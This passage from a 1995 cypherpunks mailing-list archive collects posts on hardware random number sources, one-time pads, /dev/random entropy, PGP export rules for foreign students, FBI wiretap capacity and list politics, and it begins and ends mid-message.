>I/O" chip, cost would not be a reason to leave it out.
>
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.
>
>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do?  I bet you could get a paper out of
>it.  And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.
>
>        John

There were several other posts in this thread, so interested folks might
want to check the archives for this time period.

Continuing on with Peter Monta's post:

>A radioactive source might be okay at the board level (though probably
>costlier than its electronic counterpart), but it'd be a pain to
>integrate, and it might disturb the rest of the chip.  (I'd like to
>have a get_random_bit instruction as part of a microprocessor, for
>example.)  Also if you want a high rate of random bits, you need many
>decay events, whereas for electronic sources the corresponding
>bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

I agree, for several reasons. First, I agree that electronic noise sources
are easy to build, easy to get licenses for use (basically, no licenses,
unless the ITAR boys decide random number generators are munitions--maybe
the "This t-shirt is a munition" could have "export-controlled dice"?

Second, the ease of integration as a standard library module.

However, getting the chip companies to do this will not be easy. They
generally don't see the need (hey, even _we_ don't, given the diverse
opinions on what is needed).

This is why many of us favor an external dongle that plugs in somewhere.
Then it could be sold cheaply and not have to get "buy-ins" from industry
and committees.

One idea is something that superficially looks like a modem, as everyone
has modem software and ports (though I suppose many people use internal
modems and so can't easily access it.) One would attach the "RNG-modem," a
little dongle, and grab noise into a buffer for processing (hashing,
filtering, etc.), or as ASCII garbage.

(Before anyone jokingly asks about "1-800-RANDOMS," I've thought of it. Not
practical, for obvious reasons.)

A purer approach would be just a noise source dumped into dev/random, or
whatever one wishes to call it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 4 Nov 1995 23:59:14 +0800
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511041555.KAA02171@homeport.org>
MIME-Version: 1.0
Content-Type: text



| i may have posted this at some time in the past, as i have asked it
| elsewhere and gotten different responses. i'm interested in that the
| folx here think about it though, so here it is...

I think you should read Marcus Ranum's OTP faq, on www.iwi.com:/pubs/

| i want a source of data for use as a otp. i don't want to have to
| hook up any external devices to my pc to do it. (although some of the
| methods mentioned in the past few days are quite interesting.)

Can't be done.  If you use a cipher to generate the pad, you have less
than full, honest to nature entropy, and you might as well use PGP.
Badly generated, or reused OTPs are very poor ciphers.

| i'd like to know if there was a reason not to use the output of pgp
| to do it. i've been playing with the following method. i take a file

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 03:46:48 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz Meeting/Party, 95-11-11
Message-ID: <acc0ff391c0210040aca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have sent out a detailed announcement of a "Cypherpunks Santa Cruz"
meeting/party at my house in Corralitos, California, on Saturday, 11
November.

This was sent to the mailing list of interested folks I maintain. If you
are on this list, you already got the detailed message. If you are
interested in getting on the list, drop me a line. I can also send the
detailed announcement to anyone who is interested.

As background, the Cypherpunks Santa Cruz is for folks in the Santa Cruz,
Monterey, Carmel, Boulder Creek, Watsonville, Salinas, Big Sur, etc. area,
or for anyone else on the Central Coast. Or anyone else, for that matter.
At the last (and first) party we had Greg Broiles down from Eugene, Oregon,
and Jeff Simmons up from San Luis Obispo, plus a bunch of folks from "over
the hill" in the Silicon Valley/Bay Area. All told, 25 people.

I'm not sure if there is a Bay Area meeting that day. If so, attend one or
the other, or both, as my party starts late afternoon (of course, it may be
a long drive, depending on where the Bay Aryans are meeting).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 5 Nov 1995 04:06:10 +0800
To: cypherpunks@toad.com
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511041954.MAA00210@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai <weidai@eskimo.com> writes:

>I am still talking to RSADSI's lawyers, but it's taking a lot longer 

And the efforts are appreciated. Of course, your original efforts can
still be appreciated at utopia.hacktic.nl. 

I don't know about everyone else, but that TCP encryption sounded
interesting. Any plans to discuss it on the list? 

- -----

An anonymous complainer writes:

>Well, Perry, my opinion is that there is far too much noise on this list 
>as it is.  I have already seen my words drowned out by bellyaching over 
>next to nothing.

POT-KETTLE-BLACK.

Also, since nothing you've written (in your commentary, as opposed to
anonymous announcements or releases that most people use anonymity for
here) indicates that you're using anonymity for any particular reason,
please stop so people can killfile you. Or send it from a nym at
alpha.c2.org. I mean, the NSA has your real name anyway, what's the
point... 

- ---------

Jay Campbell <edge@got.net> writes:

>>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>>                            ^^^^^^
>>I think you'll find the NSA was not in existence in the 1800's.

>I'm disappointed at the sheer number of similar pieces of email I received
>on this. You'da thought the Capn Crunch reference was silly enough that
>people would give me a funny look and trash the original message.

Hmm, I guess most of them at least had the sense to not send it to the
list. The list still sees FAR too many personal queries and rebuttals. TO
THE GUILTY: take your bonehead replies to email please.

Jay: I had a similar experience when I mentioned elsewhere that all the
primes under 1000 digits were really invented by the NSA over 20 years
ago. I recommended wearing garlic around the neck for protection... 

Everyone: This 1% wiretap thing is getting old. Hint hint hint

- ----

Lastly, regarding cpunk icons, the only ones I was able to find were at
the BAP site. I've been drawing a few of my own, one of them is done. It's
a yellow diamond that says Cypherpunk on Board. And it has the anarchy-A-
inside-a-C symbol. It's interlaced and transparent, so it doesn't look too
bad. You're all welcome to steal it at http://students.cs.byu.edu/~don.
Also working on a PGP icon. BAP has an envelope with PGP being the seal. I
was thinking maybe a deadbolt ("PGP") with the inscription "Mommy said to
lock the doors at night" or some kind of safety lock-your-doors or
lock-your-data reference. 

For the time being I'm working on a simple PGP/ZLDF icon, it will be
on my page Real Soon Now[tm]. If you like my icons please tell me.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJvC7sLa+QKZS485AQFrIgL/VuRfkh7i+K3W3bLyep26riXdZgIVC557
RRcHf9VcacXOGyVvT03JESqNxV/XRcW2k8WDQ+fwhMDEHbHjkzWT5fUxXm6knRGc
K0drBF8WlW0ZobEaiU7SgEnVjus5kFj4
=iAr6
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 5 Nov 1995 06:10:51 +0800
To: James Black <black@eng.usf.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511042157.NAA09158@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


Well, MIT does make PGP available to any and all students and staff!
The opinion I've heard is that if the US gov't doesn't want an
international student at MIT to use the code, they should keep that
student from coming to the US.  By allowing the student into the US,
the gov't is implicitly giving them the right to use PGP within the
US.

It is still illegal for them to export it, however any foreign
national can walk up to any computer store and by anything they wish,
and take it on the plane with them.  Therefore, in an institution of
higher learning, the same standards should be allowed.  If the
government does not want your student to have access to possibly
"dangerous" information, then they should not be allowed into the
country at all.

Therefore, I say just make PGP available to your students.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jek@ininx.com (John E. Kreznar)
Date: Sun, 5 Nov 1995 06:19:26 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <m0tBqd0-000147C@ininx.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hallam writes
   Stewart writes
   >Froomkin writes
   >>Hold on.  This is more "factoid" than "fact": recall that income
   >>is PAID by people as well as EARNED by people.  Most payers have
   >>easily detectible physical presence and assets that can easily be
   >>attached by regulators.  It will be a cold day before, e.g., my
   >>employer agrees not to report my earnings.  And the same is true
   >>for most employers in most industries.

   >Unfortunately, this is true, at least for people whose employers
   >are subject to income tax somewhere.  Taxing businesses doesn't
   >make sense economically - you could collect almost as much money
   >with far less disruption to the underlying economy by taxing it as
   >wages for workers and

   Why unfortunately? I happen to consider that our modern social
   ecconomy is a high point of civilisation.

Far from civilized, taxation is a residue of our savage past, and its
resurgence in this century is a backwards movement.

Relations among civilized people are by mutual consent, or not at all.
Taxation (and government generally) is an attempt by one segment of
the population (the political segment) to impose a relation upon the
rest of us to which we do not consent.

   It is certainly a tremendous achievement.  We can educate the
   entire population, provide them with health care, prevent famine
   and provide protection against crime and aggression by other
   states. All in all rather a good deal.

   While one might wish to personally avoid paying taxes there are no
   benefits if everyone avoids paying taxes. There are significant
   areas of the ecconomy which can only be funded through social
   mandates, roads for example.

My interest in cypherpunks is for its potential to enable a personal
cryptographic defense against the arrogant aggressiveness of these
arbitrary and intrusive politically motivated ``social mandates''.

What is your interest in cypherpunks?  To know your intended victims,
perhaps?

   Few people realise that when they use their credit card in a
   supermarket they are supplying a direct mail marketing company with
   a profile of their spending paterns. They are also providing a
   statement of where they are, and indirectly their income, residence
   etc.

So, don't use a credit card!

   What is needed is stringent data protection laws which enforce the
   confidentiality of personal information. Note that both the SEPP
   and STT payments systems conceal the credit card number from the
   merchant.  Cryptographic locks on individual parts of the picture
   are insufficient however. What is needed is laws which make the
   financing of the underlying architecture unecconomic.

Ah yes.  More ``social mandates''

[I don't have time to read or write cypherpunks these days, but the
idea that there's something civilized about taxation leapt out at me
and demanded a response.]

   John E. Kreznar  | 44D955A1F452DF66 | Taxes are caused by people
    jek@ininx.com   | A1575DEF434DC152 |  wanting government benefits.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
Comment: ...because I decline on principle to affirm any nationality.

iQCVAgUBMJvhbQor0ZwpiwZpAQEARgP/bOpwC16JYTxaAA5ExHOEWQl/V6FYTHmo
46MrGVhSh6WLW6yIwMi2I4mhqISjzV6BtFf+/qu6JOOq7JejqdXKZX4SMcAAWuXh
I+p3WSm5QwfLj9rfiKdnCfpO1NNsxx/HBeCIaXEY0tGVbWVp38vf+Kwugoe6a62C
3ylLFqNzgF4=
=NAy5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 6 Nov 1995 17:04:34 +0800
To: cypherpunks@toad.com
Subject: on topic!!
Message-ID: <199511042217.OAA16960@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM and TCM frequently debate about what is relevant on this list.

I have sometimes commented on this.

in fact PM's conservative stance to relevance, and TCM's more liberal
one, and the tension between the two goes back to list origins.

this is a highly inflammable topic, and I am surely going to get my
eyebrows toasted for saying *anything*, however I would like to say 
a few things:

if there were two key elements here, these conversations would probably
largely go away (instead of continually reappear)

- an unambiguous charter
- an active moderator

unfortunately I suspect that a moderator does exist but he "prefers
to remain anonymous" ("pseudonymous"?). imho that is precisely 
how *not* to succeed as a moderator.

PM and TCM are indeed filling a genuine vacuum. when the moderator is AWOL, 
pseudomoderators fight each other.

(oops, the whole idea of a moderator is just not anarchic enough. well, then
I suggest everyone just enjoy these repeated, endless displays of public
bile and hostility as the basic modus operandii of people who embrace the
glory of anarchy. anarchy in action!! but it is more fun to deny them
as total delusions and effects entirely attributable to one's enemies..)

--

also, another frequent split on this list is of politics vs. coding.
frankly I think just having two lists, one dedicated to "cypherpunk
politics", the other dedicated to "cypherpunk technicality", would
solve most problems.

and finally again I suggest as I have in the past that no one other
than the moderator really has any authority to say what is or is not 
relevant. and if you see someone say what is, take it with a grain
of salt, or ignore it if you like.

a major problem is people defending themselves when they are attacked
by someone who says "that's not relevant!!". the problem is the perception
of the loss of face. otherwise, what's the point? this is an 
interesting psychological effect that I have observed even when people use 
pseudonyms. it seems it is deeply ingrained into human behavior. this
list is in fact imho a hotbed of psychological displays. the machismo
factor is pretty thick and deep at times too.

to all this I suggest one consider the idea that "criticism by a bonehead is 
as flattering as praise from a genius".

(hee, hee)

for those who absolutely cannot refrain from trying to yell at other
people about relevant postings (judging by the mail, a rather significant
percentage) I suggest you quote the *charter* whenever you do so, to
demostrate whatever authority it is you think you have.

--

anyone who needs moderator lessons should take them from S.Sandfort,
an ex teacher who runs cypherpunk meetings involving a lot of childhood
psychologies as effectively as humanly possible, IMHO.

--

p.s. it appears to me the entrance requirements for cypherpunk membership
are to have a 150 IQ and a 75 *EQ*. and that all the arguing and hostility
comes from the more uninhibited pathological cases of these people.

--

one could in fact have great fun impersonating someone with a 
grotesquely low EQ on this list and create a tremendous reaction
among all the people with equally low EQs, responding to the bait
with the same intelligence a fish attacks a wiggling worm.

it would be "evolution in action", imho.

(hee, hee.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 03:54:30 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511040804.AAA03552@mage.qualcomm.com>
Message-ID: <199511041945.OAA06613@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Monta writes:
> But how wrong is wrong?  Unless the design is catastrophically bad,
> a zener source is going to give you zener noise plus some slight
> admixture of interference.  Say the designer is extremely careless
> and there's deterministic interference 20 dB down.  I don't see
> how even that matters cryptographically---the resulting loss in
> entropy will be millibits per sample.

[lots elided]

As a smart EE, its very easy for you to personally understand the
design of a device you have personally constructed well enough that
you can trust it. On the other hand, consider a black box Johnson
noise based device that you are handed. You check the random numbers
coming out; they seem roughly right. You know, of course, that the box
could simply be a very clever Blum-Blum-Shub based PRNG with the seed
being stored at the enemy's secret lab, and you wouldn't have any
solid handle on how to determine that without taking the device apart.

On the other hand, I can take a radiation detector and test it damn
easily with easy to aquire calibrated sources.

> A radioactive source might be okay at the board level (though probably
> costlier than its electronic counterpart), but it'd be a pain to
> integrate, and it might disturb the rest of the chip.

Certainly you can't put such a device into a portable phone -- a Zener
diode beats a geiger counter in such cases. On the other hand, a
portable phone has to deal with a threat model in which there are very
simple ways -- like plain eavesdropping -- to hear the
conversation. If, though, you have a large electronic bank's central
key management machine in mind, the extra trouble of using an external
radiation detector would probably be worthwhile, assuming you had
plugged other holes, given the ease with which the system may be
tested and the amount of cash at stake.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 07:39:29 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Derek Atkins wrote:

> student from coming to the US.  By allowing the student into the US,
> the gov't is implicitly giving them the right to use PGP within the
> US.

This is kind of a risky policy to take. The general feeling I get that 
allowing non green-card holders access to strong cryptography is sort of 
decriminalised, in that the police aren't likely to break down your door 
and have your AFS server accidentaly fall down stairs. However, it is 
still against the law, and could be used against the university in other 
unrelated circumstances.

It seems that licences allowing foreign nationals access to cryptographic 
software within the US are pretty easy to get, and especially for 
something like PGP on a central machine. 

Simon // My name is Spero, Simon Spero - licence to encrypt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 07:47:02 +0800
To: Michael Kohne <mhkohne@discordia.org>
Subject: Re: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <Pine.SOL.3.91.951104153533.6970C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Michael Kohne wrote:
> 
> Although, I don't think it has the same sort of humor value as the pillow.
> (What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)
> 

I've always wanted to make a RNG by sticking a Brownian motion detector 
into a really hot cup of tea...

Simon // Share and Enjoy(tm)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 5 Nov 1995 07:12:08 +0800
To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511042303.PAA29063@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> What is very odd however is the FBI request for $500 million.
> [to tap phones]

What is odd about that? -- when I visited Cuba a couple of years 
ago it looked to me as if a major chunk of the GNP went into
watching people.  (I hear the situation has improved since then,
perhaps thanks to their continuing bankruptcy.)


At 12:09 PM 11/2/95 -0500, hallam@w3.org wrote:
> When the NSA are being asked to comment on an export license they
> are being asked "is this thing dangerous", not "should it be exported".
> But when the response comes back to commerce "its dangerous" you can 
> hardly expect the person on the other end to put their neck out on the
> line and risk allowing [...]

This of course is the basic evil of government regulation:  Bricks are
dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
are dangerous.  Everything is dangerous, because everything could be used 
to cause harm, deliberately or accidentally.

Therefore every action needs to be supervised, controlled, and directed
by your wise and benevolent government, and any attempt to avoid the
benevolent observation of the all seeing eye shows that you must be a 
child pornographer-terrorist-drug-trafficker-money-launderer.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 5 Nov 1995 07:12:09 +0800
To: Rich Graves <nbrodbeck@hollandhart.com>
Subject: Re: Telephone switch capacity -Reply
Message-ID: <199511042303.PAA29072@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 PM 11/3/95 -0800, Rich Graves wrote:
> Of course the FBI doesn't have the staff to listen to all these lines, and
> they need an individual court order to authorize each individual
> interception, so this numbers game is a bit of a joke. 


This is false:

The FBI is legally authorized to intercept phone lines by court
order "or other lawful authority".

>From the money it would seem that "other lawful authority" intercepts
vastly exceed court ordered intercepts.

You will recall the vast outcry in the liberal lapdog press when this
vast new power was given to them -- You don't recall it?!  Neither do I.

This is one of the many vast extensions of government power that we
see come down at a steadily increasing rate, to the accompaniment
of total silence from a compliant and submissive mass media.

> There is no controversy about the number of wiretaps that have been
> authorized, except as manufactured by the Spotlight folks and other
> conspiracy loons. 

If the only taps are court ordered wiretaps, it would seem we
are paying about half a million to a million dollars per wire
tap, which is a shade expensive even for government work.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:07:19 +0800
To: cypherpunks@toad.com
Subject: Re: Telephone switch capacity
Message-ID: <199511042351.PAA07347@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Please be aware that the current capacity of the
>telephone system in the United States (and for that matter,
>most of the developed world) is only capable of supporting
>between 15 and 20 percent simultaneous telephone
>conversations.  If the FBI wishes to set up a system that is
>capable of monitoring 1% of the total number of lines, that
>equates to a ability to tap 5%, not 1% of all calls in progress.

The FBI now says they only want to tap 1% of simultaneous capacity,
not 1% of total number of lines.  On the other hand, the actual utilization
of the telephone network is also much lower than the number of lines -
back when I was a voice-telephony geek, our estimates for busy-hour
phone utilization were about 1/12 for residential and 1/6 for business
(3 and 6 hundred call-seconds per hour); that was before widespread
use of fax machines, modems, or LANs, so business utilization has
probably increased.  Equipped trunk capacity was typically enough to
have a maximum of 1% blocking during busy hour, which means a certain
amount of margin over average calls in progress, and switch capacity 
depends radically on technology - some kinds of switches are non-blocking,
while others have various capacity limits.

"One Bell System - It Works!"
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:07:14 +0800
To: amp <Alan.Pugh@internetMCI.COM>
Subject: Re: using pgp to make an otp
Message-ID: <199511042351.PAA07430@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 11/5/95 -0500, amp <Alan.Pugh@internetMCI.COM> wrote:
>i want a source of data for use as a otp. 
....
>i'd like to know if there was a reason not to use the output of pgp

Either PGP is a strong enough cryptosystem that you don't need
to use a one-time-pad, or it's not, in which case you need better
randomness than PGP will give you (I doubt it), or you have special
applications for which PGP is impractical (like decrypting small amounts
of data on a very wimpy machine in an environment that you can easily
distribute OTP keys (for using ONCE ONLY)).  Or you're just doing it for fun.

A OTP can give you provably secure cryptography, given that the pad
is only used once, and has real randomness behind it.  If it's only
pseudo-random numbers (e.g. generated from some algorithm), then
it's as crackable as the source of random numbers, and therefore no
longer provably secure.  And of course, if you use it more than once,
or your pad distribution isn't secure, you lose.

>i still need a program to make use of the otp i've produced, 

Two alternatives - spend 5 minutes writing it in a language you know well,
or pick a language you don't know very well and use it as an excuse
to learn the language.  It's slightly more complex than "hello, world",
since you need to input data from two files and use XOR.  

>what are the holes in this?  why would it be unadvisable to do it?
The big problem with OTPs (other than getting people to use the pads
ONLY ONCE, since they're otherwise hosed) is shipping them around;
the traditional method is guys with briefcases handcuffed to their arms....

>otoh, would it be a good basis for a otp?
Large quantities of good random numbers are hard to find.  Small quantities
can come from dice or throwing darts at the stock market pages;
the zener diode or radioactivity methods people have been discussing
will produce larger quantities if you've got the equipment.
If you've got one of those new radio-tuner boards for your PC, tuning it
to an unused station might be quite decent, and we've just been discussing
whether video is any good.

With many of these sources, it's probably worth grinding the numbers through
some sort of compression or encryption algorithm just to smudge over any
periodicity or other structure to it.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:08:29 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <199511042352.PAA07530@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>How useful would it be to use a video stream as a source of random input
>>to something like /dev/random?  I'm thinking along the lines of a
>>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>>It seems to me that the picture recieved by a camera sitting atop a
>>monitor would be quite unpredictable. (relatively) High bandwith, too.

Depends on what the camera's looking at - the first frame you grab may have
a lot of entropy, but if there's nothing much going on in the room, 
one frame's going to look a lot like the next.  Of course, pointing the camera
at your keyboard and taking a video of you typing in lots of random
numbers will probably produce better randomness than just timing the keys
while you do so...  But do move it away before typing in your passphrase...
Pointing the camera at a snowy TV or out the window or at a cat playing
with catnip can generate much more randomness if you need it.

Somebody was saying that of course not may computers will have video capture
devices on them, but it was probably one of those parochial PC or Unix geeks
who forget that Mac users get all the cool video/audio gear long before
the rest of us :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:08:41 +0800
To: cypherpunks@toad.com
Subject: /dev/random - using up entropy?
Message-ID: <199511042352.PAA07554@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The discussions of what to do when /dev/random has handed out all of its
available entropy have assumed that entropy gets used up; I'd like to 
propose that maybe it doesn't, at least in the computational-complexity
sense that says that you don't have the computational power around to
calculate the information inside /dev/random from the output,
giving a sort of "computational entropy" that reflects not only the 
uncertainty you have because of randomness but also the uncertainty
you have because of your computational limitations.

Most of the designs I've seen look like this:
        A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
        An input stream I = I1....Ik, which is mixed into R
        A mixing function F which is used to mix R <= F(R,I) 
                for some chunk of I, possibly empty.
        A hash function H, typically MD5.
        An output O = O1...Om = H(R), and E gets mixed after every output.
                (These are capital-o, not zero...)

The entropy E of the reservoir E before an output is
        -SUM(all X) p(X) log p(X)
where X is an event R1=x1, R2=x2 ... Rn=Xn
which is equal to n, assuming the Ri are iid equiprobable 0 or 1.

After an output, the entropy is
        - SUM p(X | H(R)=O) log p(X|H(R)=O)
which works out to n-m, since p(X) is zero if H(R)!=O, and 2**m/2**n if it does.
So that says you use up m bits of entropy if you get m bits of good output.

However, what I'd like to suggest is that you don't, from the perspective
of a user who doesn't have direct access to the reservoir R of random bits.
For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
the user is neither able to invert H, nor to enumerate all possible R,
nor to calculate anything useful based on multiple outputs, since the
reservoir R is shuffled between outputs; even a simple circular shift
may be enough.   This doesn't apply to the case where n is 32 or 48
and the hash function produces n-bit outputs, or even m<<n bit outputs,
because that maybe be inverted or brute-forced, but it seems to apply
for the case where n is sufficiently large and the hash is good.
If the hash is simpler than MD5, it may apply anyway, since the hash
produces far fewer bits than its input, as long as the hash and the
mixing function don't give away any information about the reservoir
between successive outputs.

This would suggest that /dev/random ought to have a mode that says
"give me output of whatever quality you have available",
and that it ought to be OK to use it, as long as the reservoir has 
been seeded with sufficient high-entropy input to have decent randomness.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 5 Nov 1995 08:14:07 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
Message-ID: <199511050001.QAA09434@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


> This is kind of a risky policy to take. The general feeling I get that 
> allowing non green-card holders access to strong cryptography is sort of 
> decriminalised, in that the police aren't likely to break down your door 
> and have your AFS server accidentaly fall down stairs. However, it is 
> still against the law, and could be used against the university in other 
> unrelated circumstances.

Actually, its not.  There is precedent, in that at one point (rumour
mode on -- I have not verified this story) MIT was asked to not allow
certain students into the MIT nuclear reactor.  These international
students had been accepted into the Nuclear Engineering program, which
sort of requires them to have access.  MIT's response was to tell the
gov't that if they didn't want to let these students have access to
the nuclear reactor, then they should not be allowed in the country,
since MIT will not discriminate against students based on silly
criteria such as where they live.  The state department said they
couldn't do that, since they had nothing to keep the students out of
the country.  MIT responded that they couldnt do it either, and the
gov't backed down.

I'm not convinced that it is as risky as you say.  Besides, MIT does
have a lot of political power, so they are more likely to get away
with it than other places might.  However I think it is a reasonable
position for an educational institution to take.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 5 Nov 1995 05:19:52 +0800
To: cypherpunks@toad.com
Subject: re:using PGP only for digital signatures
Message-ID: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
  I am in a discussion (during the week) with a system administrator 
about seeing if we can just make PGP publically available to everyone, 
but now the discussion seems to be to just allow PGP to do digital 
signatures, and I don't think that is the best choice, then.  They are 
not against PGP being used, but there are legal issues as to whether they 
can offer it to everyone, as some students are international students, 
and are not allowed to use the version for the US, or so I have been 
informed, so now I need to see if we can have the international version, 
so these students can use it. :(
  Is there any good programs (for the Unix, SunOS) that just does digital 
signature encryption?  What they are trying to do is make certain that no 
one can send a message to anyone, claim to be in the faculty, and cause 
problems that way.  My position is just a student programmer, but I am 
trying to learn as much as I can, to answer questions and deal with problems.
  Thanx.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:52:34 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
